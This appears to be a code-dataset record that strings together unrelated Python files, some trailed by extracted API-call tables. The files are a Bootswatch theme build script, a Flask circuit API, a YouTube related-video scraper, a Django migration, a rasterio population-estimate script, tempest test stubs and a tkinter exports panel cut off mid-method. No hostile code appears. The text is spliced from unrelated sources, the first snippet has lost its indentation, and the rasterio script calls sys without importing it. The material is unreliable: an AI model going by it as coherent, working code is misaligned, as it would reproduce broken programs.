f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/index.html"
f = open(outfile, 'w')
for line in lines:
line = re.sub('Yeti', values['uc'], line)
line = re.sub('yeti', values['lc'], line)
line = re.sub('UA-[0-9\-]+', '', line)
f.write(line)
f.close()
cmd = "/cygdrive/c/Users/keeshand/AppData/Roaming/npm/grunt swatch:{0}".format(values['lc'])
os.system(cmd)
cmd = "cp {0}/bootstrap.min.css ../vurple_com/pelican-themes/bootstrap3/static/css/bootstrap.{0}.min.css".format(values['lc'])
os.system(cmd)
cmd = "cp bower_components/font-awesome/css/*.css ../vurple_com/pelican-themes/bootstrap3/static/css/."
os.system(cmd)
cmd = "cp bower_components/font-awesome/fonts/* ../vurple_com/pelican-themes/bootstrap3/static/fonts/."
os.system(cmd)
cmd = "cp bower_components/bootstrap/fonts/* ../vurple_com/pelican-themes/bootstrap3/static/fonts/."
os.system(cmd)
cmd = "cp bower_components/bootstrap/dist/js/* ../vurple_com/pelican-themes/bootstrap3/static/js/."
os.system(cmd)
if __name__ == '__main__':
main()
| [
"re.sub",
"os.system",
"re.search"
] | [((2055, 2069), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2064, 2069), False, 'import os\n'), ((2210, 2224), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2219, 2224), False, 'import os\n'), ((2342, 2356), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2351, 2356), False, 'import os\n'), ((2469, 2483), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2478, 2483), False, 'import os\n'), ((2594, 2608), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2603, 2608), False, 'import os\n'), ((2717, 2731), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2726, 2731), False, 'import os\n'), ((326, 360), 're.sub', 're.sub', (['"""Yeti"""', "values['uc']", 'line'], {}), "('Yeti', values['uc'], line)\n", (332, 360), False, 'import re\n'), ((376, 410), 're.sub', 're.sub', (['"""yeti"""', "values['lc']", 'line'], {}), "('yeti', values['lc'], line)\n", (382, 410), False, 'import re\n'), ((426, 463), 're.sub', 're.sub', (['"""#008cba"""', "values['cl']", 'line'], {}), "('#008cba', values['cl'], line)\n", (432, 463), False, 'import re\n'), ((479, 600), 're.sub', 're.sub', (['"""headings-font-family: @font-family-base"""', '"""headings-font-family: @font-family-header-sans-serif"""', 'line'], {}), "('headings-font-family: @font-family-base',\n 'headings-font-family: @font-family-header-sans-serif', line)\n", (485, 600), False, 'import re\n'), ((608, 636), 're.search', 're.search', (['"""Open Sans"""', 'line'], {}), "('Open Sans', line)\n", (617, 636), False, 'import re\n'), ((1071, 1105), 're.sub', 're.sub', (['"""Yeti"""', "values['uc']", 'line'], {}), "('Yeti', values['uc'], line)\n", (1077, 1105), False, 'import re\n'), ((1117, 1147), 're.search', 're.search', (['"""Open\\\\+Sans"""', 'line'], {}), "('Open\\\\+Sans', line)\n", (1126, 1147), False, 'import re\n'), ((1180, 1212), 're.search', 're.search', (['"""web-font-path"""', 'line'], {}), "('web-font-path', line)\n", (1189, 1212), False, 'import re\n'), ((1781, 1815), 're.sub', 're.sub', (['"""Yeti"""', "values['uc']", 'line'], {}), "('Yeti', values['uc'], line)\n", (1787, 1815), False, 'import re\n'), ((1831, 1865), 're.sub', 're.sub', (['"""yeti"""', "values['lc']", 'line'], {}), "('yeti', values['lc'], line)\n", (1837, 1865), False, 'import re\n'), ((1881, 1913), 're.sub', 're.sub', (['"""UA-[0-9\\\\-]+"""', '""""""', 'line'], {}), "('UA-[0-9\\\\-]+', '', line)\n", (1887, 1913), False, 'import re\n'), ((657, 690), 're.sub', 're.sub', (['"""Open Sans"""', '"""Lato"""', 'line'], {}), "('Open Sans', 'Lato', line)\n", (663, 690), False, 'import re\n')] |
#!/usr/bin/python3
from validData import *
from command import *
from readback import *
import sys
import time
# Expected Input
# 1: Row -> 0 to 9
# 2: Column -> 0 to 19
if (
isInt(sys.argv[1]) and strLengthIs(sys.argv[1],1) and
isInt(sys.argv[2]) and (strLengthIs(sys.argv[2],1) or strLengthIs(sys.argv[2],2))
):
command = ["PixelToWeb"]
command.append(sys.argv[1])
command.append(sys.argv[2])
setNewCommand(command)
time.sleep(.3)
print(readbackGet())
readbackClear()
else:
f = open("/var/www/pixel/python/.error", "a")
f.write(sys.argv[0] + '\n')
f.write(sys.argv[1] + '\n')
f.write(sys.argv[2] + '\n')
f.write(sys.argv[3] + '\n')
f.close()
| [
"time.sleep"
] | [((462, 477), 'time.sleep', 'time.sleep', (['(0.3)'], {}), '(0.3)\n', (472, 477), False, 'import time\n')] |
from getpass import getpass
from colorama import init, Fore, Back, Style
yes = ['Y', 'y', 'YES', 'yes', 'Yes']
class interface(object):
"""
Terminal CLI
"""
def log(self, arg, get=False):
if not get:
print("[*]: {} ".format(arg))
else:
return "[*]: {} ".format(arg)
def error(self, arg, get=False):
"""Short summary.
Parameters
----------
arg : str
String to print
get : bool
If true, returns a string with the formated string
Returns
-------
str
If get = true, returns a string with the formated string
"""
if not get:
print(Fore.RED + "[ERROR]: {}".format(arg))
print(Style.RESET_ALL)
exit(-1)
else:
return "[ERROR]: {}".format(arg)
def warning(self, arg, get=False):
if not get:
print(Fore.YELLOW + "[!]: {}".format(arg), end='')
print(Style.RESET_ALL)
else:
return "[!]: {}".format(arg)
def sure(self):
user = input(self.log("Are you sure? (y/N) ", get=True))
if user in yes:
return 0
else:
exit(0)
def newpasswd(self):
condition = True
while condition is True:
user_psswd = getpass("[*]: Password:")
user_psswd_repeat = getpass("[*]: Repeat password:")
if user_psswd == user_psswd_repeat:
condition = False
else:
self.warning("Passwords don't match! Try again")
return user_psswd_repeat
def passwd(self):
return getpass()
def info(self, arg):
print(Fore.BLACK + Back.WHITE + "[i]: {}".format(arg) + ' ', end='')
print(Style.RESET_ALL)
| [
"getpass.getpass"
] | [((1690, 1699), 'getpass.getpass', 'getpass', ([], {}), '()\n', (1697, 1699), False, 'from getpass import getpass\n'), ((1361, 1386), 'getpass.getpass', 'getpass', (['"""[*]: Password:"""'], {}), "('[*]: Password:')\n", (1368, 1386), False, 'from getpass import getpass\n'), ((1419, 1451), 'getpass.getpass', 'getpass', (['"""[*]: Repeat password:"""'], {}), "('[*]: Repeat password:')\n", (1426, 1451), False, 'from getpass import getpass\n')] |
from app.models import Circuit, CircuitSchema, Provider
from flask import make_response, jsonify
from app import db
def read_all():
"""
This function responds to a request for /circuits
with the complete lists of circuits
:return: sorted list of circuits
"""
circuits = Circuit.query.all()
schema = CircuitSchema(many=True)
return schema.dump(circuits).data
def read_one(circuit_id):
circuit = Circuit.query.filter(Circuit.id == circuit_id).one_or_none()
if not circuit:
text = f'circuit not found for id {circuit_id}'
return make_response(jsonify(error=404, message=text), 404)
schema = CircuitSchema()
data = schema.dump(circuit).data
return data
def create(circuit):
"""
creates a circuit! checks to see if the provider_cid is unique and
that the provider exists.
:return: circuit
"""
provider_cid = circuit.get('provider_cid')
provider_id = circuit.get('provider_id')
circuit_exists = Circuit.query.filter(
Circuit.provider_cid == provider_cid
).one_or_none()
provider_exists = Provider.query.filter(Provider.id == provider_id).one_or_none()
if circuit_exists:
text = f'Circuit {provider_cid} already exists'
return make_response(jsonify(error=409, message=text), 409)
if not provider_exists:
text = f'Provider {provider_id} does not exist.' 'Unable to create circuit'
return make_response(jsonify(error=403, message=text), 403)
schema = CircuitSchema()
new_circuit = schema.load(circuit, session=db.session).data
db.session.add(new_circuit)
db.session.commit()
data = schema.dump(new_circuit).data
return data, 201
def update(circuit_id, circuit):
"""
updates a circuit!
:return: circuit
"""
c = Circuit.query.filter_by(id=circuit_id).one_or_none()
if not c:
text = f'Can not update a circuit that does not exist!'
return make_response(jsonify(error=409, message=text), 404)
schema = CircuitSchema()
update = schema.load(circuit, session=db.session).data
db.session.merge(update)
db.session.commit()
data = schema.dump(c).data
return data, 201
| [
"app.db.session.commit",
"app.db.session.merge",
"app.models.Circuit.query.filter",
"app.models.Circuit.query.all",
"app.models.Provider.query.filter",
"app.db.session.add",
"app.models.Circuit.query.filter_by",
"app.models.CircuitSchema",
"flask.jsonify"
] | [((304, 323), 'app.models.Circuit.query.all', 'Circuit.query.all', ([], {}), '()\n', (321, 323), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((337, 361), 'app.models.CircuitSchema', 'CircuitSchema', ([], {'many': '(True)'}), '(many=True)\n', (350, 361), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((663, 678), 'app.models.CircuitSchema', 'CircuitSchema', ([], {}), '()\n', (676, 678), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((1532, 1547), 'app.models.CircuitSchema', 'CircuitSchema', ([], {}), '()\n', (1545, 1547), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((1617, 1644), 'app.db.session.add', 'db.session.add', (['new_circuit'], {}), '(new_circuit)\n', (1631, 1644), False, 'from app import db\n'), ((1649, 1668), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1666, 1668), False, 'from app import db\n'), ((2056, 2071), 'app.models.CircuitSchema', 'CircuitSchema', ([], {}), '()\n', (2069, 2071), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((2136, 2160), 'app.db.session.merge', 'db.session.merge', (['update'], {}), '(update)\n', (2152, 2160), False, 'from app import db\n'), ((2165, 2184), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2182, 2184), False, 'from app import db\n'), ((443, 489), 'app.models.Circuit.query.filter', 'Circuit.query.filter', (['(Circuit.id == circuit_id)'], {}), '(Circuit.id == circuit_id)\n', (463, 489), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((610, 642), 'flask.jsonify', 'jsonify', ([], {'error': '(404)', 'message': 'text'}), '(error=404, message=text)\n', (617, 642), False, 'from flask import make_response, jsonify\n'), ((1015, 1073), 'app.models.Circuit.query.filter', 'Circuit.query.filter', (['(Circuit.provider_cid == provider_cid)'], {}), '(Circuit.provider_cid == provider_cid)\n', (1035, 1073), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((1125, 1174), 'app.models.Provider.query.filter', 'Provider.query.filter', (['(Provider.id == provider_id)'], {}), '(Provider.id == provider_id)\n', (1146, 1174), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((1298, 1330), 'flask.jsonify', 'jsonify', ([], {'error': '(409)', 'message': 'text'}), '(error=409, message=text)\n', (1305, 1330), False, 'from flask import make_response, jsonify\n'), ((1479, 1511), 'flask.jsonify', 'jsonify', ([], {'error': '(403)', 'message': 'text'}), '(error=403, message=text)\n', (1486, 1511), False, 'from flask import make_response, jsonify\n'), ((1843, 1881), 'app.models.Circuit.query.filter_by', 'Circuit.query.filter_by', ([], {'id': 'circuit_id'}), '(id=circuit_id)\n', (1866, 1881), False, 'from app.models import Circuit, CircuitSchema, Provider\n'), ((2003, 2035), 'flask.jsonify', 'jsonify', ([], {'error': '(409)', 'message': 'text'}), '(error=409, message=text)\n', (2010, 2035), False, 'from flask import make_response, jsonify\n')] |
import asyncio
import json
import re
from collections import deque
from typing import Deque, Dict, List, Match, Pattern
import aiohttp
from .error import RateLimited
headers: dict = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
}
DATA_JSON: Pattern = re.compile(
r'(?:window\["ytInitialData"\]|ytInitialData)\W?=\W?({.*?});'
)
def fetch(vURL: str, local_addr: str = None) -> List[Dict]:
return asyncio.run(async_fetch(vURL, local_addr))
async def async_fetch(vURL: str, local_addr: str = None) -> List[Dict]:
connector: aiohttp.TCPConnector = (
aiohttp.TCPConnector(local_addr=(local_addr, 0)) if local_addr else None
)
async with aiohttp.ClientSession(connector=connector, headers=headers) as session:
async with session.get(vURL) as response:
if response.status == 429:
raise RateLimited
RAW: str = await response.text()
Search: Match = DATA_JSON.search(RAW)
if not Search:
raise ValueError("Could not extract ytInitialData.")
Data: Dict = json.loads(Search.group(1))
Overlay: Dict = Data["playerOverlays"]["playerOverlayRenderer"]
watchNextEndScreenRenderer: Dict = Overlay["endScreen"][
"watchNextEndScreenRenderer"
]
Result: list = [
{
"id": Item["videoId"],
"title": Item["title"]["simpleText"],
"duration": Item["lengthInSeconds"] if "lengthInSeconds" in Item else None,
}
for Item in [
result["endScreenVideoRenderer"]
for result in watchNextEndScreenRenderer["results"]
if "endScreenVideoRenderer" in result
]
]
return Result
class preventDuplication:
def __init__(self):
self._LastRelated: Deque = deque(maxlen=10)
def get(self, vURL: str, local_addr: str = None) -> Dict:
return asyncio.run(self.async_get(vURL, local_addr))
async def async_get(self, vURL: str, local_addr: str = None) -> Dict:
Data: List[Dict] = await async_fetch(vURL, local_addr)
for Item in Data:
if not Item["id"] in self._LastRelated:
self._LastRelated.append(Item["id"])
return Item
self._LastRelated.clear()
return Data[0]
| [
"aiohttp.ClientSession",
"aiohttp.TCPConnector",
"collections.deque",
"re.compile"
] | [((301, 377), 're.compile', 're.compile', (['"""(?:window\\\\["ytInitialData"\\\\]|ytInitialData)\\\\W?=\\\\W?({.*?});"""'], {}), '(\'(?:window\\\\["ytInitialData"\\\\]|ytInitialData)\\\\W?=\\\\W?({.*?});\')\n', (311, 377), False, 'import re\n'), ((619, 667), 'aiohttp.TCPConnector', 'aiohttp.TCPConnector', ([], {'local_addr': '(local_addr, 0)'}), '(local_addr=(local_addr, 0))\n', (639, 667), False, 'import aiohttp\n'), ((713, 772), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {'connector': 'connector', 'headers': 'headers'}), '(connector=connector, headers=headers)\n', (734, 772), False, 'import aiohttp\n'), ((1814, 1830), 'collections.deque', 'deque', ([], {'maxlen': '(10)'}), '(maxlen=10)\n', (1819, 1830), False, 'from collections import deque\n')] |
# Generated by Django 2.2.5 on 2019-09-24 09:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, verbose_name='이름')),
('score', models.PositiveIntegerField(default=0, verbose_name='점수')),
('image', models.ImageField(blank=True, null=True, upload_to='category')),
],
),
migrations.CreateModel(
name='Request',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='제목')),
('content', models.TextField(verbose_name='내용')),
('status', models.CharField(blank=True, choices=[('start', '도움요청중'), ('progress', '진행중'), ('complete', '완료')], default='start', max_length=20, verbose_name='상태')),
('score', models.PositiveIntegerField(default=0, verbose_name='점수')),
('main_address', models.CharField(blank=True, max_length=30, null=True, verbose_name='메인 주소')),
('detail_address', models.CharField(blank=True, max_length=50, null=True, verbose_name='상세 주소')),
('latitude', models.FloatField(blank=True, null=True, verbose_name='위도')),
('longitude', models.FloatField(blank=True, null=True, verbose_name='경도')),
('occurred_at', models.DateField(blank=True, null=True, verbose_name='발생 시각')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='업로드 시각')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='수정 시각')),
],
),
migrations.CreateModel(
name='RequestImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='request/%Y/%m/%d', verbose_name='이미지')),
('request', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='request.Request', verbose_name='의뢰')),
],
),
]
| [
"django.db.models.FloatField",
"django.db.models.DateField",
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.DateTimeField",
"django.db.models.AutoField",
"django.db.models.PositiveIntegerField",
"django.db.models.ImageField",
"django.db.models.CharField"
] | [((337, 430), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (353, 430), False, 'from django.db import migrations, models\n'), ((454, 504), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)', 'verbose_name': '"""이름"""'}), "(max_length=30, verbose_name='이름')\n", (470, 504), False, 'from django.db import migrations, models\n'), ((533, 590), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""점수"""'}), "(default=0, verbose_name='점수')\n", (560, 590), False, 'from django.db import migrations, models\n'), ((619, 681), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'null': '(True)', 'upload_to': '"""category"""'}), "(blank=True, null=True, upload_to='category')\n", (636, 681), False, 'from django.db import migrations, models\n'), ((814, 907), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (830, 907), False, 'from django.db import migrations, models\n'), ((932, 983), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'verbose_name': '"""제목"""'}), "(max_length=100, verbose_name='제목')\n", (948, 983), False, 'from django.db import migrations, models\n'), ((1014, 1049), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""내용"""'}), "(verbose_name='내용')\n", (1030, 1049), False, 'from django.db import migrations, models\n'), ((1079, 1237), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'choices': "[('start', '도움요청중'), ('progress', '진행중'), ('complete', '완료')]", 'default': '"""start"""', 'max_length': '(20)', 'verbose_name': '"""상태"""'}), "(blank=True, choices=[('start', '도움요청중'), ('progress',\n '진행중'), ('complete', '완료')], default='start', max_length=20,\n verbose_name='상태')\n", (1095, 1237), False, 'from django.db import migrations, models\n'), ((1258, 1315), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""점수"""'}), "(default=0, verbose_name='점수')\n", (1285, 1315), False, 'from django.db import migrations, models\n'), ((1351, 1427), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(30)', 'null': '(True)', 'verbose_name': '"""메인 주소"""'}), "(blank=True, max_length=30, null=True, verbose_name='메인 주소')\n", (1367, 1427), False, 'from django.db import migrations, models\n'), ((1465, 1541), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'null': '(True)', 'verbose_name': '"""상세 주소"""'}), "(blank=True, max_length=50, null=True, verbose_name='상세 주소')\n", (1481, 1541), False, 'from django.db import migrations, models\n'), ((1573, 1632), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""위도"""'}), "(blank=True, null=True, verbose_name='위도')\n", (1590, 1632), False, 'from django.db import migrations, models\n'), ((1665, 1724), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""경도"""'}), "(blank=True, null=True, verbose_name='경도')\n", (1682, 1724), False, 'from django.db import migrations, models\n'), ((1759, 1820), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""발생 시각"""'}), "(blank=True, null=True, verbose_name='발생 시각')\n", (1775, 1820), False, 'from django.db import migrations, models\n'), ((1854, 1916), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""업로드 시각"""'}), "(auto_now_add=True, verbose_name='업로드 시각')\n", (1874, 1916), False, 'from django.db import migrations, models\n'), ((1950, 2007), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""수정 시각"""'}), "(auto_now=True, verbose_name='수정 시각')\n", (1970, 2007), False, 'from django.db import migrations, models\n'), ((2145, 2238), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (2161, 2238), False, 'from django.db import migrations, models\n'), ((2263, 2330), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""request/%Y/%m/%d"""', 'verbose_name': '"""이미지"""'}), "(upload_to='request/%Y/%m/%d', verbose_name='이미지')\n", (2280, 2330), False, 'from django.db import migrations, models\n'), ((2361, 2492), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""images"""', 'to': '"""request.Request"""', 'verbose_name': '"""의뢰"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='images', to='request.Request', verbose_name='의뢰')\n", (2378, 2492), False, 'from django.db import migrations, models\n')] |
#!/usr/bin/python3
from typing import Dict
import optparse
import numpy as np
import rasterio
from rasterio import features
def main(county_pop_file, spatial_dist_file, fname_out, no_data_val=-9999):
'''
county_pop_file: County level population estimates
spatial_dist_file: Spatial projection of population distribution
'''
# -------------------------------------
# Open and read raster file with county
# level population estimates
# -------------------------------------
with rasterio.open(county_pop_file) as rastf:
county_pop = rastf.read()
nodatacp = rastf.nodata
# --------------------------------------------------------------
# Open and read raster file with spatial population distribution
# --------------------------------------------------------------
with rasterio.open(spatial_dist_file) as rastf:
pop_dist = rastf.read()
nodatasp = rastf.nodata
prf = rastf.profile
county_pop = np.squeeze(county_pop)
pop_dist = np.squeeze(pop_dist)
pop_est = np.ones(pop_dist.shape)*no_data_val
ind1 = np.where(county_pop.flatten() != nodatacp)[0]
ind2 = np.where(pop_dist.flatten() != nodatasp)[0]
ind = np.intersect1d(ind1, ind2)
ind2d = np.unravel_index(ind, pop_dist.shape)
pop_est[ind2d] = county_pop[ind2d] * pop_dist[ind2d]
pop_est[ind2d] = np.round(pop_est[ind2d])
# Update raster meta-data
prf.update(nodata=no_data_val)
# Write out spatially distributed population estimate to raster
with open(fname_out, "wb") as fout:
with rasterio.open(fout.name, 'w', **prf) as out_raster:
out_raster.write(pop_est.astype(rasterio.float32), 1)
argparser = optparse.OptionParser()
argparser.add_option('--population-file', action='store', dest='pop_file',
help='County level population estimates')
argparser.add_option('--dist-file', action='store', dest='dist_file',
help='Spatial projection of population distribution')
argparser.add_option('--out-file', action='store', dest='out_file',
help='Filename of the output')
(options, args) = argparser.parse_args()
if not options.pop_file:
print('Please specify a population file with --population-file')
sys.exit(1)
if not options.dist_file:
print('Please specify a distribution file with --dist-file')
sys.exit(1)
if not options.out_file:
print('Please specify the name of the output with --out-file')
sys.exit(1)
main(options.pop_file, options.dist_file, options.out_file)
| [
"numpy.intersect1d",
"numpy.ones",
"rasterio.open",
"optparse.OptionParser",
"numpy.squeeze",
"numpy.unravel_index",
"numpy.round"
] | [((1730, 1753), 'optparse.OptionParser', 'optparse.OptionParser', ([], {}), '()\n', (1751, 1753), False, 'import optparse\n'), ((996, 1018), 'numpy.squeeze', 'np.squeeze', (['county_pop'], {}), '(county_pop)\n', (1006, 1018), True, 'import numpy as np\n'), ((1034, 1054), 'numpy.squeeze', 'np.squeeze', (['pop_dist'], {}), '(pop_dist)\n', (1044, 1054), True, 'import numpy as np\n'), ((1229, 1255), 'numpy.intersect1d', 'np.intersect1d', (['ind1', 'ind2'], {}), '(ind1, ind2)\n', (1243, 1255), True, 'import numpy as np\n'), ((1268, 1305), 'numpy.unravel_index', 'np.unravel_index', (['ind', 'pop_dist.shape'], {}), '(ind, pop_dist.shape)\n', (1284, 1305), True, 'import numpy as np\n'), ((1385, 1409), 'numpy.round', 'np.round', (['pop_est[ind2d]'], {}), '(pop_est[ind2d])\n', (1393, 1409), True, 'import numpy as np\n'), ((519, 549), 'rasterio.open', 'rasterio.open', (['county_pop_file'], {}), '(county_pop_file)\n', (532, 549), False, 'import rasterio\n'), ((843, 875), 'rasterio.open', 'rasterio.open', (['spatial_dist_file'], {}), '(spatial_dist_file)\n', (856, 875), False, 'import rasterio\n'), ((1070, 1093), 'numpy.ones', 'np.ones', (['pop_dist.shape'], {}), '(pop_dist.shape)\n', (1077, 1093), True, 'import numpy as np\n'), ((1598, 1634), 'rasterio.open', 'rasterio.open', (['fout.name', '"""w"""'], {}), "(fout.name, 'w', **prf)\n", (1611, 1634), False, 'import rasterio\n')] |
import testtools
from oslo_log import log
from tempest.api.compute import base
import tempest.api.compute.flavors.test_flavors as FlavorsV2Test
import tempest.api.compute.flavors.test_flavors_negative as FlavorsListWithDetailsNegativeTest
import tempest.api.compute.flavors.test_flavors_negative as FlavorDetailsNegativeTest
from tempest.common.utils import data_utils
from tempest.lib import exceptions as lib_exc
from tempest.lib import decorators
from tempest import test
from tempest import config
CONF = config.CONF
LOG = log.getLogger(__name__)
class HybridFlavorsV2TestJSON(FlavorsV2Test.FlavorsV2TestJSON):
"""Test flavors"""
@testtools.skip("testscenarios are not active.")
@test.SimpleNegativeAutoTest
class HybridFlavorsListWithDetailsNegativeTestJSON(FlavorsListWithDetailsNegativeTest.FlavorsListWithDetailsNegativeTestJSON):
"""Test FlavorsListWithDetails"""
@testtools.skip("testscenarios are not active.")
@test.SimpleNegativeAutoTest
class HybridFlavorDetailsNegativeTestJSON(FlavorDetailsNegativeTest.FlavorDetailsNegativeTestJSON):
"""Test FlavorsListWithDetails"""
| [
"testtools.skip",
"oslo_log.log.getLogger"
] | [((530, 553), 'oslo_log.log.getLogger', 'log.getLogger', (['__name__'], {}), '(__name__)\n', (543, 553), False, 'from oslo_log import log\n'), ((644, 691), 'testtools.skip', 'testtools.skip', (['"""testscenarios are not active."""'], {}), "('testscenarios are not active.')\n", (658, 691), False, 'import testtools\n'), ((888, 935), 'testtools.skip', 'testtools.skip', (['"""testscenarios are not active."""'], {}), "('testscenarios are not active.')\n", (902, 935), False, 'import testtools\n')] |
#!/usr/bin/env python3
"""
dycall.exports
~~~~~~~~~~~~~~
Contains `ExportsFrame` and `ExportsTreeView`.
"""
from __future__ import annotations
import logging
import pathlib
from typing import TYPE_CHECKING
import ttkbootstrap as tk
from ttkbootstrap import ttk
from ttkbootstrap.dialogs import Messagebox
from ttkbootstrap.localization import MessageCatalog as MsgCat
from ttkbootstrap.tableview import Tableview
from dycall._widgets import _TrLabelFrame
from dycall.types import Export, PEExport
from dycall.util import StaticThemedTooltip, get_img
log = logging.getLogger(__name__)
class ExportsFrame(_TrLabelFrame):
"""Contains **Exports** combobox and a button for `ExportsTreeView`.
Use command line argument `--exp` to select an export from the library on
launch. Combobox validates export name.
TODO: Combobox works like google search (auto-suggest, recents etc.)
"""
def __init__(
self,
root: tk.Window,
selected_export: tk.StringVar,
sort_order: tk.StringVar,
output: tk.StringVar,
status: tk.StringVar,
is_loaded: tk.BooleanVar,
is_native: tk.BooleanVar,
is_reinitialised: tk.BooleanVar,
lib_path: tk.StringVar,
exports: list[Export],
):
log.debug("Initalising")
super().__init__(text="Exports")
self.__root = root
self.__selected_export = selected_export
self.__sort_order = sort_order
self.__output = output
self.__status = status
self.__is_loaded = is_loaded
self.__is_native = is_native
self.__is_reinitialised = is_reinitialised
self.__lib_path = lib_path
self.__exports = exports
self.__export_names: list[str] = []
self.cb = ttk.Combobox(
self,
state="disabled",
textvariable=selected_export,
validate="focusout",
validatecommand=(self.register(self.cb_validate), "%P"),
)
# ! self.cb.bind("<Return>", lambda *_: self.cb_validate) # Doesn't work
self.cb.bind("<<ComboboxSelected>>", self.cb_selected)
self.__list_png = get_img("list.png")
self.lb = ttk.Label(self, image=self.__list_png)
self.lb.bind(
"<Enter>", lambda *_: StaticThemedTooltip(self.lb, "List of exports")
)
self.lb.bind(
"<ButtonRelease-1>", lambda *_: status.set("Load a library first!")
)
self.lb.pack(padx=(0, 5), pady=5, side="right")
self.cb.pack(fill="x", padx=5, pady=5)
self.bind_all("<<PopulateExports>>", lambda *_: self.set_cb_values())
self.bind_all(
"<<ToggleExportsFrame>>", lambda event: self.set_state(event.state == 1)
)
self.bind_all("<<SortExports>>", lambda *_: self.sort())
log.debug("Initialised")
def cb_selected(self, *_):
"""Callback to handle clicks on **Exports** combobox.
Resets **Output** and activates/deactivates `FunctionFrame`.
"""
log.debug("%s selected", self.__selected_export.get())
self.__output.set("")
if self.__is_native.get():
self.__root.event_generate("<<ToggleFunctionFrame>>", state=1)
else:
self.__root.event_generate("<<ToggleFunctionFrame>>", state=0)
def cb_validate(self, *_) -> bool:
"""Callback to handle keyboard events on **Exports** combobox.
Activates `FunctionFrame` when the text in the combobox
is a valid export name. Deactivates it otherwise.
"""
log.debug("Validating Exports combobox")
try:
# Don't validate if combobox dropdown arrow was pressed
self.cb.state()[1] == "pressed"
except IndexError:
exp = self.cb.get()
if exp:
if exp in self.__export_names:
self.cb_selected()
return True
self.__root.event_generate("<<ToggleFunctionFrame>>", state=1)
return False
return True
def set_state(self, activate: bool = True):
"""Activates/deactivates **Exports** combobox.
Args:
activate (bool, optional): Activated when True, deactivated when
False. Defaults to True.
"""
log.debug("Called with activate=%s", activate)
state = "normal" if activate else "disabled"
self.cb.configure(state=state)
def set_cb_values(self):
"""Demangles and sets the export names to the **Exports** combobox."""
exports = self.__exports
if not self.__is_reinitialised.get() or self.__is_loaded.get():
num_exports = len(exports)
log.info("Found %d exports", num_exports)
self.__status.set(f"{num_exports} exports found")
failed = []
for exp in exports:
if isinstance(exp, PEExport):
if hasattr(exp, "exc"):
failed.append(exp.name)
if failed:
Messagebox.show_warning(
f"These export names couldn't be demangled: {failed}",
"Demangle Errors",
parent=self.__root,
)
self.__export_names = names = list(e.demangled_name for e in exports)
self.set_state()
self.cb.configure(values=names)
selected_export = self.__selected_export.get()
if selected_export:
if selected_export not in names:
err = "%s not found in export names"
log.error(err, selected_export)
Messagebox.show_error(
err % selected_export, "Export not found", parent=self.__root
)
